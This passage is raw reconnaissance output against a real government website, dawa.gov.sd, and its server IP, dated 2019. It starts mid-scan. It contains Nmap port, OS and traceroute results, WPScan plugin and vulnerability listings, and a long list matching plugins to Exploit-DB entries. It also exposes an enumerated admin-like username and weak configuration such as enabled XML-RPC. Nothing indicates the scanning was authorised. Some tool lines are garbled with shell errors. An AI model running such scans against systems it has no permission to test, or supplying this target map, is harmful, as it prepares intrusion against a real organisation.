- ECN(R=Y%DF=Y%T=3F%W=7210%O=M44FNNSNW7%CC=Y%Q=)
- T1(R=Y%DF=Y%T=3F%S=O%A=S+%F=AS%RD=0%Q=)
- T2(R=N)
- T3(R=N)
- T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
- T5(R=Y%DF=Y%T=3F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
- T6(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
- T7(R=N)
- U1(R=Y%DF=N%T=3F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
- IE(R=Y%DFI=N%T=3F%CD=S)
- Uptime guess: 8.259 days (since Wed Apr 24 01:37:05 2019)
- Network Distance: 14 hops
- TCP Sequence Prediction: Difficulty=258 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: Host: server.sdserverweb
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 20.73 ms 10.246.200.1
- 2 20.93 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 37.90 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 23.20 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 20.90 ms motl-b1-link.telia.net (62.115.162.41)
- 6 ...
- 7 118.37 ms ldn-bb4-link.telia.net (62.115.112.245)
- 8 125.74 ms prs-bb4-link.telia.net (62.115.114.229)
- 9 118.38 ms ffm-bb4-link.telia.net (62.115.114.99)
- 10 118.41 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 113.14 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
- 12 112.57 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
- 13 115.97 ms hosted-by.leaseweb.com (46.165.226.255)
- 14 112.63 ms 37.58.63.157
- NSE: Script Post-scanning.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 07:50
- Completed NSE at 07:50, 0.00s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 07:50
- Completed NSE at 07:50, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 465.86 seconds
- Raw packets sent: 83 (5.762KB) | Rcvd: 451 (258.086KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:50 EDT
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 07:50
- Completed NSE at 07:50, 0.00s elapsed
- Initiating NSE at 07:50
- Completed NSE at 07:50, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 07:50
- Completed Parallel DNS resolution of 1 host. at 07:50, 0.03s elapsed
- Initiating UDP Scan at 07:50
- Scanning 37.58.63.157 [14 ports]
- Discovered open port 53/udp on 37.58.63.157
- Completed UDP Scan at 07:50, 5.56s elapsed (14 total ports)
- Initiating Service scan at 07:50
- Scanning 3 services on 37.58.63.157
- Service scan Timing: About 66.67% done; ETC: 07:52 (0:00:49 remaining)
- Completed Service scan at 07:52, 97.58s elapsed (3 services on 1 host)
- Initiating OS detection (try #1) against 37.58.63.157
- Retrying OS detection (try #2) against 37.58.63.157
- Initiating Traceroute at 07:52
- Completed Traceroute at 07:52, 7.08s elapsed
- Initiating Parallel DNS resolution of 1 host. at 07:52
- Completed Parallel DNS resolution of 1 host. at 07:52, 0.01s elapsed
- NSE: Script scanning 37.58.63.157.
- Initiating NSE at 07:52
- Completed NSE at 07:52, 0.30s elapsed
- Initiating NSE at 07:52
- Completed NSE at 07:52, 1.01s elapsed
- Nmap scan report for 37.58.63.157
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain (unknown banner: none)
- | dns-nsid:
- |_ bind.version: none
- | fingerprint-strings:
- | DNSVersionBindReq:
- | version
- | bind
- | none
- | NBTStat:
- |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- 67/udp closed dhcps
- 68/udp open|filtered dhcpc
- 69/udp closed tftp
- 88/udp closed kerberos-sec
- 123/udp closed ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp closed snmp
- 162/udp closed snmptrap
- 389/udp closed ldap
- 520/udp closed route
- 2049/udp closed nfs
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-UDP:V=7.70%I=7%D=5/2%Time=5CCAD98A%P=x86_64-pc-linux-gnu%r(DNSVe
- SF:rsionBindReq,3D,"\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\
- SF:0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0\x02\0
- SF:\x03\0\0\0\0\0\x02\xc0\x0c")%r(DNSStatusRequest,C,"\0\0\x90\x04\0\0\0\0
- SF:\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x15\0\x01\0\0\0\0\0\0\x20CKAAAAAA
- SF:AAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
- Too many fingerprints match this host to give specific OS details
- Network Distance: 14 hops
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 ... 4
- 5 22.60 ms 10.246.200.1
- 6 ... 7
- 8 21.21 ms 10.246.200.1
- 9 21.55 ms 10.246.200.1
- 10 21.54 ms 10.246.200.1
- 11 21.54 ms 10.246.200.1
- 12 21.54 ms 10.246.200.1
- 13 21.55 ms 10.246.200.1
- 14 21.57 ms 10.246.200.1
- 15 ... 18
- 19 24.33 ms 10.246.200.1
- 20 21.72 ms 10.246.200.1
- 21 ... 27
- 28 20.71 ms 10.246.200.1
- 29 ...
- 30 21.61 ms 10.246.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 07:52
- Completed NSE at 07:52, 0.00s elapsed
- Initiating NSE at 07:52
- Completed NSE at 07:52, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 116.02 seconds
- Raw packets sent: 119 (5.357KB) | Rcvd: 885 (309.722KB)
- #######################################################################################################################################
- [+] URL: http://dawa.gov.sd/
- [+] Started: Thu May 2 06:19:10 2019
- Interesting Finding(s):
- [+] http://dawa.gov.sd/
- | Interesting Entries:
- | - X-Powered-By: PHP/7.0.33, PleskLin
- | - X-Cache-Status: STALE
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
- | Detected By: Emoji Settings (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
- | Confirmed By: Meta Generator (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
- [+] WordPress theme in use: dawa-child
- | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
- | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
- | Style Name: dawa Child
- | Style URI: http://#
- | Description: dawa...
- | Author: Gasim
- | Author URI: http://#
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
- [+] Enumerating All Plugins (via Passive Methods)
- [+] Checking Plugin Versions (via Passive and Aggressive Methods)
- [i] Plugin(s) Identified:
- [+] js_composer
- | Location: http://dawa.gov.sd/wp-content/plugins/js_composer/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- | Confirmed By:
- | Meta Generator (Passive Detection)
- | Body Tag (Passive Detection)
- |
- | Version: 4.11.1 (80% confidence)
- | Detected By: Query Parameter (Passive Detection)
- | - http://dawa.gov.sd/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.1
- | - http://dawa.gov.sd/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.11.1
- | Confirmed By: Body Tag (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'js-comp-ver-4.11.1'
- [+] pw-vc-box-post-layout
- | Location: http://dawa.gov.sd/wp-content/plugins/pw-vc-box-post-layout/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] pw-vc-news-ticker-post-layout
- | Location: http://dawa.gov.sd/wp-content/plugins/pw-vc-news-ticker-post-layout/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] revslider
- | Location: http://dawa.gov.sd/wp-content/plugins/revslider/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- | Confirmed By:
- | Comment (Passive Detection)
- | Div Data Version (Passive Detection)
- | Meta Generator (Passive Detection)
- |
- | Version: 5.2.3.5 (100% confidence)
- | Detected By: Meta Generator (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'Powered by Slider Revolution 5.2.3.5'
- | Confirmed By: Comment (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'START REVOLUTION SLIDER 5.2.3.5'
- [+] Ultimate_VC_Addons
- | Location: http://dawa.gov.sd/wp-content/plugins/Ultimate_VC_Addons/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: Ultimate Addons for Visual Composer <= 3.16.11 - Authenticated XSS, CSRF, RCE
- | Fixed in: 3.16.12
- | References:
- | - https://wpvulndb.com/vulnerabilities/8821
- | - http://wphutte.com/ultimate-addons-for-visual-composer-v3-16-10-xss-csrf-rce/
- | - https://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199
- |
- | The version could not be determined.
- [+] vc-extensions-bundle
- | Location: http://dawa.gov.sd/wp-content/plugins/vc-extensions-bundle/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] wordfence
- | Location: http://dawa.gov.sd/wp-content/plugins/wordfence/
- | Latest Version: 7.2.5
- | Last Updated: 2019-04-18T15:48:00.000Z
- |
- | Detected By: Javascript Var (Passive Detection)
- |
- | [!] 12 vulnerabilities identified:
- |
- | [!] Title: Wordfence 3.8.6 - lib/IPTraf.php User-Agent Header Stored XSS
- | Fixed in: 3.8.7
- | References:
- | - https://wpvulndb.com/vulnerabilities/6140
- | - https://secunia.com/advisories/56558/
- |
- | [!] Title: Wordfence 3.8.1 - Password Creation Restriction Bypass
- | Fixed in: 3.8.3
- | Reference: https://wpvulndb.com/vulnerabilities/6141
- |
- | [!] Title: Wordfence 3.8.1 - wp-admin/admin.php whois Parameter Stored XSS
- | Fixed in: 3.8.3
- | References:
- | - https://wpvulndb.com/vulnerabilities/6142
- | - http://packetstormsecurity.com/files/122993/
- | - http://www.securityfocus.com/bid/62053/
- |
- | [!] Title: Wordfence 3.3.5 - XSS & IAA
- | Fixed in: 3.3.7
- | References:
- | - https://wpvulndb.com/vulnerabilities/6143
- | - https://secunia.com/advisories/51055/
- | - http://seclists.org/fulldisclosure/2012/Oct/139
- |
- | [!] Title: Wordfence 5.2.4 - Unspecified Issue
- | Fixed in: 5.2.5
- | Reference: https://wpvulndb.com/vulnerabilities/7581
- |
- | [!] Title: Wordfence 5.2.4 - IPTraf.php URI Request Stored XSS
- | Fixed in: 5.2.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7582
- | - http://packetstormsecurity.com/files/128259/
- |
- | [!] Title: Wordfence 5.2.3 - Banned IP Functionality Bypass
- | Fixed in: 5.2.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/7583
- | - http://packetstormsecurity.com/files/128259/
- | - http://seclists.org/fulldisclosure/2014/Sep/49
- | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
- |
- | [!] Title: Wordfence 5.2.3 - Multiple Vulnerabilities
- | Fixed in: 5.2.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/7612
- | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
- |
- | [!] Title: Wordfence <= 5.2.4 - Multiple Vulnerabilities (XSS & Bypasses)
- | Fixed in: 5.2.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7636
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4664
- | - https://secupress.me/blog/wordfence-5-2-5-security-update/
- | - http://www.securityfocus.com/bid/70915/
- |
- | [!] Title: Wordfence 5.2.2 - XSS in Referer Header
- | Fixed in: 5.2.3
- | References:
- | - https://wpvulndb.com/vulnerabilities/7698
- | - https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
- |
- | [!] Title: Wordfence <= 5.1.4 - Cross-Site Scripting (XSS)
- | Fixed in: 5.1.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7711
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4932
- |
- | [!] Title: Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
- | Fixed in: 7.1.14
- | References:
- | - https://wpvulndb.com/vulnerabilities/9135
- | - http://www.waraxe.us/advisory-109.html
- | - http://packetstormsecurity.com/files/149845/
- |
- | The version could not be determined.
- [+] wp-super-cache
- | Location: http://dawa.gov.sd/wp-content/plugins/wp-super-cache/
- | Latest Version: 1.6.4
- | Last Updated: 2018-12-20T09:36:00.000Z
- |
- | Detected By: Comment (Passive Detection)
- |
- | [!] 10 vulnerabilities identified:
- |
- | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6623
- | - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
- | - http://wordpress.org/support/topic/pwn3d
- | - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
- |
- | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6624
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6625
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6626
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6627
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6628
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
- | Fixed in: 1.3.1
- | References:
- | - https://wpvulndb.com/vulnerabilities/6629
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- |
- | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
- | Fixed in: 1.4.3
- | References:
- | - https://wpvulndb.com/vulnerabilities/7889
- | - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
- |
- | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
- | Fixed in: 1.4.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/8197
- | - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- |
- | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
- | Fixed in: 1.4.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/8198
- | - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- |
- | The version could not be determined.
- [+] Enumerating Config Backups (via Passive and Aggressive Methods)
- Checking Config Backups - Time: 00:00:01 <=============> (21 / 21) 100.00% Time: 00:00:01
- [i] No Config Backups Found.
- [+] Finished: Thu May 2 06:19:44 2019
- [+] Requests Done: 94
- [+] Cached Requests: 5
- [+] Data Sent: 14.951 KB
- [+] Data Received: 274.581 KB
- [+] Memory used: 153.277 MB
- [+] Elapsed time: 00:00:33
- #######################################################################################################################################
- [+] URL: http://dawa.gov.sd/
- [+] Started: Thu May 2 06:19:14 2019
- Interesting Finding(s):
- [+] http://dawa.gov.sd/
- | Interesting Entries:
- | - X-Powered-By: PHP/7.0.33, PleskLin
- | - X-Cache-Status: STALE
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
- | Detected By: Emoji Settings (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
- | Confirmed By: Meta Generator (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
- [+] WordPress theme in use: dawa-child
- | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
- | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
- | Style Name: dawa Child
- | Style URI: http://#
- | Description: dawa...
- | Author: Gasim
- | Author URI: http://#
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
- [i] No Users Found.
- [+] Finished: Thu May 2 06:19:30 2019
- [+] Requests Done: 36
- [+] Cached Requests: 26
- [+] Data Sent: 5.495 KB
- [+] Data Received: 23.748 KB
- [+] Memory used: 94.168 MB
- [+] Elapsed time: 00:00:16
- #######################################################################################################################################
- [+] URL: http://dawa.gov.sd/
- [+] Started: Thu May 2 06:23:39 2019
- Interesting Finding(s):
- [+] http://dawa.gov.sd/
- | Interesting Entries:
- | - X-Powered-By: PHP/7.0.33, PleskLin
- | - X-Cache-Status: STALE
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
- | Detected By: Emoji Settings (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
- | Confirmed By: Meta Generator (Passive Detection)
- | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
- [+] WordPress theme in use: dawa-child
- | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
- | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
- | Style Name: dawa Child
- | Style URI: http://#
- | Description: dawa...
- | Author: Gasim
- | Author URI: http://#
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:00:00 <============> (10 / 10) 100.00% Time: 00:00:00
- [i] No Users Found.
- [+] Finished: Thu May 2 06:23:49 2019
- [+] Requests Done: 13
- [+] Cached Requests: 49
- [+] Data Sent: 1.927 KB
- [+] Data Received: 6.935 KB
- [+] Memory used: 94.375 MB
- [+] Elapsed time: 00:00:10
- #######################################################################################################################################
- [-] Date & Time: 02/05/2019 06:19:09
- [I] Threads: 5
- [-] Target: http://dawa.gov.sd (37.58.63.157)
- [M] Website Not in HTTPS: http://dawa.gov.sd
- [I] X-Powered-By: PHP/7.0.33
- [L] X-Frame-Options: Not Enforced
- [I] Strict-Transport-Security: Not Enforced
- [I] X-Content-Security-Policy: Not Enforced
- [I] X-Content-Type-Options: Not Enforced
- [L] Robots.txt Found: http://dawa.gov.sd/robots.txt
- [I] CMS Detection: WordPress
- [I] Wordpress Version: 5.0.4
- [I] Wordpress Theme: dawa
- [-] WordPress usernames identified:
- [M] adnum2
- [M] XML-RPC services are enabled
- [I] Autocomplete Off Not Found: http://dawa.gov.sd/wp-login.php
- [-] Default WordPress Files:
- [I] http://dawa.gov.sd/license.txt
- [I] http://dawa.gov.sd/readme.html
- [I] http://dawa.gov.sd/wp-content/themes/twentynineteen/readme.txt
- [I] http://dawa.gov.sd/wp-content/themes/twentyseventeen/README.txt
- [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/genericons/COPYING.txt
- [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/genericons/LICENSE.txt
- [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/readme.txt
- [I] http://dawa.gov.sd/wp-includes/ID3/license.commercial.txt
- [I] http://dawa.gov.sd/wp-includes/ID3/license.txt
- [I] http://dawa.gov.sd/wp-includes/ID3/readme.txt
- [I] http://dawa.gov.sd/wp-includes/images/crystal/license.txt
- [I] http://dawa.gov.sd/wp-includes/js/plupload/license.txt
- [I] http://dawa.gov.sd/wp-includes/js/swfupload/license.txt
- [I] http://dawa.gov.sd/wp-includes/js/tinymce/license.txt
- [-] Searching Wordpress Plugins ...
- [I] "+plugin+"
- [I] $plugin
- [I] 1-flash-gallery
- [M] EDB-ID: 17801 "WordPress Plugin 1 Flash Gallery 1.30 < 1.5.7a - Arbitrary File Upload (Metasploit)"
- [I] 1-jquery-photo-gallery-slideshow-flash
- [M] EDB-ID: 36382 "WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting"
- [I] 2-click-socialmedia-buttons
- [M] EDB-ID: 37178 "WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities"
- [I] Calendar
- [M] EDB-ID: 21715 "WordPress Plugin spider Calendar - Multiple Vulnerabilities"
- [I] Calendar-Script
- [M] EDB-ID: 38018 "WordPress Plugin PHP Event Calendar - 'cid' SQL Injection"
- [I] Enigma2.php?boarddir=http:
- [I] FlagEm
- [M] EDB-ID: 38674 "WordPress Plugin FlagEm - 'cID' Cross-Site Scripting"
- [I] Lead-Octopus-Power
- [M] EDB-ID: 39269 "WordPress Plugin Lead Octopus Power - 'id' SQL Injection"
- [I] Premium_Gallery_Manager
- [M] EDB-ID: 34538 "WordPress Plugin Premium Gallery Manager - Configuration Access"
- [M] EDB-ID: 39111 "WordPress Plugin Premium Gallery Manager - Arbitrary File Upload"
- [I] Tevolution
- [M] EDB-ID: 40976 "WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload"
- [I] Ultimate_VC_Addons
- [I] a-gallery
- [M] EDB-ID: 17872 "Multiple WordPress Plugins - 'timthumb.php' File Upload"
- [I] a-to-z-category-listing
- [M] EDB-ID: 17809 "WordPress Plugin A to Z Category Listing 1.3 - SQL Injection"
- [I] abtest
- [M] EDB-ID: 39577 "WordPress Plugin Abtest - Local File Inclusion"
- [I] accept-signups
- [M] EDB-ID: 35136 "WordPress Plugin Accept Signups 0.1 - 'email' Cross-Site Scripting"
- [I] acf-frontend-display
- [I] ad-wizz
- [M] EDB-ID: 35561 "WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting"
- [I] admin_panel.php?wp_footnotes_current_settings[post_footnotes]=<
- /bin/sh: 1: lt: not found
- /bin/sh: 1: [&=/]: not found
- [I] admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=<
- /bin/sh: 1: lt: not found
- /bin/sh: 1: [&=/]: not found
- [I] adminimize
- [M] EDB-ID: 36325 "WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting"
- [I] adrotate
- [M] EDB-ID: 17888 "WordPress Plugin AdRotate 3.6.5 - SQL Injection"
- [M] EDB-ID: 18114 "WordPress Plugin AdRotate 3.6.6 - SQL Injection"
- [M] EDB-ID: 31834 "WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection"
- [I] ads-box
- [M] EDB-ID: 38060 "WordPress Plugin Ads Box - 'count' SQL Injection"
- [I] advanced-dewplayer
- [M] EDB-ID: 38936 "WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal"
- [I] advanced-text-widget
- [M] EDB-ID: 36324 "WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting"
- [I] advanced-uploader
- [M] EDB-ID: 38867 "WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities"
- [I] advertizer
- [M] EDB-ID: 17750 "WordPress Plugin Advertizer 1.0 - SQL Injection"
- [I] age-verification
- [M] EDB-ID: 18350 "WordPress Plugin Age Verification 0.4 - Open Redirect"
- [M] EDB-ID: 36540 "WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection"
- [I] ajax-category-dropdown
- [M] EDB-ID: 17207 "WordPress Plugin Ajax Category Dropdown 0.1.5 - Multiple Vulnerabilities"
- [I] ajax-store-locator-wordpress_0
- [M] EDB-ID: 35493 "WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download"
- [I] ajaxgallery
- [M] EDB-ID: 17686 "WordPress Plugin Ajax Gallery 3.0 - SQL Injection"
- [I] akismet
- [M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
- [M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
- [I] alert-before-your-post
- [M] EDB-ID: 36323 "WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting"
- [I] all-in-one-event-calendar
- [M] EDB-ID: 37075 "WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget-form.php?title' Cross-Site Scripting"
- [M] EDB-ID: 37076 "WordPress Plugin All-in-One Event Calendar 1.4 - 'box_publish_button.php?button_value' Cross-Site Scripting"
- [M] EDB-ID: 37077 "WordPress Plugin All-in-One Event Calendar 1.4 - 'save_successful.php?msg' Cross-Site Scripting"
- [M] EDB-ID: 37078 "WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities"
- [I] all-in-one-wp-security-and-firewall
- [M] EDB-ID: 34854 "WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting"
- [I] all-video-gallery
- [M] EDB-ID: 22427 "WordPress Plugin All Video Gallery 1.1 - SQL Injection"
- [I] allow-php-in-posts-and-pages
- [M] EDB-ID: 17688 "WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection"
- [I] allwebmenus-wordpress-menu-plugin
- [M] EDB-ID: 17861 "WordPress Plugin AllWebMenus 1.1.3 - Remote File Inclusion"
- [M] EDB-ID: 18407 "WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload"
- [I] alo-easymail
- [I] annonces
- [M] EDB-ID: 17863 "WordPress Plugin Annonces 1.2.0.0 - Remote File Inclusion"
- [I] answer-my-question
- [M] EDB-ID: 40771 "WordPress Plugin Answer My Question 1.3 - SQL Injection"
- [I] appointment-booking-calendar
- [M] EDB-ID: 39309 "WordPress Plugin Booking Calendar Contact Form 1.1.23 - SQL Injection"
- [M] EDB-ID: 39319 "WordPress Plugin Booking Calendar Contact Form 1.1.23 - Shortcode SQL Injection"
- [M] EDB-ID: 39341 "WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities"
- [M] EDB-ID: 39342 "WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection"
- [I] aspose-doc-exporter
- [M] EDB-ID: 36559 "WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download"
- [I] asset-manager
- [M] EDB-ID: 18993 "WordPress Plugin Asset Manager 0.2 - Arbitrary File Upload"
- [I] audio
- [M] EDB-ID: 35258 "WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting"
- [I] audio-player
- [M] EDB-ID: 38300 "WordPress Plugin Audio Player - 'playerID' Cross-Site Scripting"
- [I] auto-attachments
- [I] aviary-image-editor-add-on-for-gravity-forms
- [M] EDB-ID: 37275 "WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload"
- [I] backwpup
- [M] EDB-ID: 35400 "WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities"
- [I] baggage-freight
- [M] EDB-ID: 46061 "WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload"
- [I] baggage_shipping
- [I] bbpress
- [M] EDB-ID: 22396 "WordPress Plugin bbPress - Multiple Vulnerabilities"
- [I] bezahlcode-generator
- [M] EDB-ID: 35286 "WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting"
- [I] booking
- [M] EDB-ID: 27399 "WordPress Plugin Booking Calendar 4.1.4 - Cross-Site Request Forgery"
- [I] booking-calendar-contact-form
- [M] EDB-ID: 37003 "WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities"
- [I] bookx
- [M] EDB-ID: 39251 "WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion"
- [I] brandfolder
